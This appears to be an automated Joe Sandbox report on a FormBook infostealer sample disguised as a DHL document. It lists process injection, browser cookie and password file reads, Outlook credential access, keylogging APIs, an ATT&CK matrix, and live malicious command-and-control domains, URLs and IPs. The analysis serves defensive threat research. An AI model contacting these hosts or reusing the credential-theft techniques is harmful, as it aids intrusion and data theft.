Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: NULL target: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\unlodctr.exe

Thread register set: target process: 7992

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\unlodctr.exe

Thread APC queued: target process: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 3F7008

Jump to behavior

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

0_2_00211201

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_001F2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_001F2BA5

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_0021B226 SendInput,keybd_event,

0_2_0021B226

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_002322DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_002322DA

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe"	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Process created: C:\Windows\SysWOW64\unlodctr.exe "C:\Windows\SysWOW64\unlodctr.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

0_2_00210B62

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_00211663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00211663

Source: DHL DOCS 2-0106-25.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: DHL DOCS 2-0106-25.exe, MSNzUrVSel.exe, 00000003.00000000.1854195198.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000003.00000002.4112684967.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000007.00000000.2002137715.00000000011D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: MSNzUrVSel.exe, 00000003.00000000.1854195198.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000003.00000002.4112684967.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000007.00000000.2002137715.00000000011D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: MSNzUrVSel.exe, 00000003.00000000.1854195198.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000003.00000002.4112684967.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000007.00000000.2002137715.00000000011D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: MSNzUrVSel.exe, 00000003.00000000.1854195198.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000003.00000002.4112684967.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000007.00000000.2002137715.00000000011D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_001D0698 cpuid

0_2_001D0698

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_00228195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00228195

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_0020D27A GetUserNameW,

0_2_0020D27A

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_001EBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_001EBB6F

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_001B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001B42DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1931217148.00000000029B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4113279367.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1930912470.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4113355046.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4115406780.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4113347590.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4111924093.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1931729344.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\unlodctr.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: DHL DOCS 2-0106-25.exe	Binary or memory string: WIN_81
Source: DHL DOCS 2-0106-25.exe	Binary or memory string: WIN_XP
Source: DHL DOCS 2-0106-25.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: DHL DOCS 2-0106-25.exe	Binary or memory string: WIN_XPe
Source: DHL DOCS 2-0106-25.exe	Binary or memory string: WIN_VISTA
Source: DHL DOCS 2-0106-25.exe	Binary or memory string: WIN_7
Source: DHL DOCS 2-0106-25.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1931217148.00000000029B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4113279367.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1930912470.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4113355046.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4115406780.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4113347590.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4111924093.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1931729344.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_00231204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00231204
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_00231806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00231806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL DOCS 2-0106-25.exe	53%	ReversingLabs	Win32.Worm.DorkBot
DHL DOCS 2-0106-25.exe	29%	Virustotal		Browse
DHL DOCS 2-0106-25.exe	100%	Avira	DR/AutoIt.Gen8
DHL DOCS 2-0106-25.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.cruycq.info/mywm/	0%	Avira URL Cloud	safe
http://www.lonfor.website/stiu/	0%	Avira URL Cloud	safe
http://www.sutbkn.info/7nib/	0%	Avira URL Cloud	safe
http://www.overlayoasis.quest/c83d/	0%	Avira URL Cloud	safe
http://www.cruycq.info	0%	Avira URL Cloud	safe
http://www.y6h6kn.top/9aud/	0%	Avira URL Cloud	safe
http://www.uzshou.world/ricr/	0%	Avira URL Cloud	safe
http://www.maplesyrup7.click/4nhb/	0%	Avira URL Cloud	safe
http://www.x3kwqc5tye4vl90y.top/4uqm/	0%	Avira URL Cloud	safe
http://www.marketyemen.holdings/nmrk/	0%	Avira URL Cloud	safe
https://overlayoasis.quest/c83d/?Jz1hrtoh=jxTzUjVIZaofx7j	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
nosolofichas.online	84.32.84.32	true	true	unknown
www.maplesyrup7.click	188.114.97.3	true	true	unknown
www.y6h6kn.top	162.251.95.62	true	true	unknown
www.sutbkn.info	47.83.1.90	true	true	unknown
www.marketyemen.holdings	199.59.243.228	true	true	unknown
www.lonfor.website	199.192.21.169	true	true	unknown
www.overlayoasis.quest	172.67.148.216	true	true	unknown
zcdn.8383dns.com	134.122.135.48	true	true	unknown
www.uzshou.world	188.114.97.3	true	true	unknown
www.cruycq.info	47.83.1.90	true	true	unknown
www.clubhoodies.shop	unknown	unknown	false	unknown
www.dnft.immo	unknown	unknown	false	unknown
www.nosolofichas.online	unknown	unknown	false	unknown
www.cozythreads.store	unknown	unknown	false	unknown
www.x3kwqc5tye4vl90y.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.cruycq.info/mywm/	true	Avira URL Cloud: safe	unknown
http://www.maplesyrup7.click/4nhb/	true	Avira URL Cloud: safe	unknown
http://www.marketyemen.holdings/nmrk/	true	Avira URL Cloud: safe	unknown
http://www.y6h6kn.top/9aud/	true	Avira URL Cloud: safe	unknown
http://www.lonfor.website/stiu/	true	Avira URL Cloud: safe	unknown
http://www.uzshou.world/ricr/	true	Avira URL Cloud: safe	unknown
http://www.sutbkn.info/7nib/	true	Avira URL Cloud: safe	unknown
http://www.x3kwqc5tye4vl90y.top/4uqm/	true	Avira URL Cloud: safe	unknown
http://www.overlayoasis.quest/c83d/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	unlodctr.exe, 00000004.00000002.4116442701.00000000068A0000.00000004.00000800.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4114712280.000000000483A000.00000004.10000000.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000007.00000002.4113693473.000000000342A000.00000004.00000001.00040000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.cruycq.info	MSNzUrVSel.exe, 00000007.00000002.4115406780.0000000005045000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://overlayoasis.quest/c83d/?Jz1hrtoh=jxTzUjVIZaofx7j	unlodctr.exe, 00000004.00000002.4114712280.0000000004CF0000.00000004.10000000.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000007.00000002.4113693473.00000000038E0000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
199.192.21.169	www.lonfor.website	United States	22612	NAMECHEAP-NETUS	true
188.114.97.3	www.maplesyrup7.click	European Union	13335	CLOUDFLARENETUS	true
47.83.1.90	www.sutbkn.info	United States	3209	VODANETInternationalIP-BackboneofVodafoneDE	true
172.67.148.216	www.overlayoasis.quest	United States	13335	CLOUDFLARENETUS	true
84.32.84.32	nosolofichas.online	Lithuania	33922	NTT-LT-ASLT	true
199.59.243.228	www.marketyemen.holdings	United States	395082	BODIS-NJUS	true
134.122.135.48	zcdn.8383dns.com	United States	64050	BCPL-SGBGPNETGlobalASNSG	true
162.251.95.62	www.y6h6kn.top	United States	26484	IKGUL-26484US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585261
Start date and time:	2025-01-07 12:21:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DHL DOCS 2-0106-25.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@13/8
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 97% Number of executed functions: 44 Number of non-executed functions: 305
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.253.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target MSNzUrVSel.exe, PID 3752 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
06:22:56	API Interceptor	11887193x Sleep call for process: unlodctr.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
199.192.21.169	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	www.lonfor.website/bowc/
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	www.sesanu.xyz/rf25/
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.lonfor.website/bowc/
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.lonfor.website/bowc/
	inv#12180.exe	Get hash	malicious	FormBook	Browse	www.lonfor.website/bowc/
	URGENT REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook	Browse	www.technectar.top/ghvt/
	FW CMA SHZ Freight invoice CHN1080769.exe	Get hash	malicious	FormBook	Browse	www.technectar.top/ghvt/
	NU1aAbSmCr.exe	Get hash	malicious	FormBook	Browse	www.tophm.xyz/30rz/
	lPX6PixV4t.exe	Get hash	malicious	FormBook	Browse	www.zenscape.top/d8cw/
	Z6s208B9QX.exe	Get hash	malicious	FormBook	Browse	www.zenscape.top/d8cw/
188.114.97.3	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.y6h6kn.top	6SN0DJ38zZ.exe	Get hash	malicious	FormBook	Browse	103.23.149.28
	Payment Copy #190922-001.exe	Get hash	malicious	FormBook	Browse	103.23.149.28
	ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe	Get hash	malicious	FormBook	Browse	162.251.95.62
www.lonfor.website	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	inv#12180.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
zcdn.8383dns.com	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	inv#12180.exe	Get hash	malicious	FormBook	Browse	154.21.203.24
www.cruycq.info	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
www.cruycq.info	ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe	Get hash	malicious	FormBook	Browse	47.83.1.90

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	104.16.123.96
	https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	104.17.25.14
	file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip	Get hash	malicious	Unknown	Browse	172.64.149.23
	Mansourbank Swift-TT379733 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	172.64.41.3
	Mansourbank Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	104.18.186.31
	https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8d	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	https://link.edgepilot.com/s/1b4c2fcb/nQHbBC0YQUOfuyi9X74dgg?u=https://url.usb.m.mimecastprotect.com/s/sZGCCm7Wwmt5092LsBiWSRG4Fz?domain=link.edgepilot.com	Get hash	malicious	Unknown	Browse	104.18.69.40
	https://bawarq.org/r.php?id=YoExsdlTj9ej3sIxs1X7aZn3DzYWS8OQ2	Get hash	malicious	Unknown	Browse	104.18.11.207
	https://d3sdeiz39xdvhy.cloudfront.net	Get hash	malicious	Unknown	Browse	172.67.136.18
CLOUDFLARENETUS	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	104.16.123.96
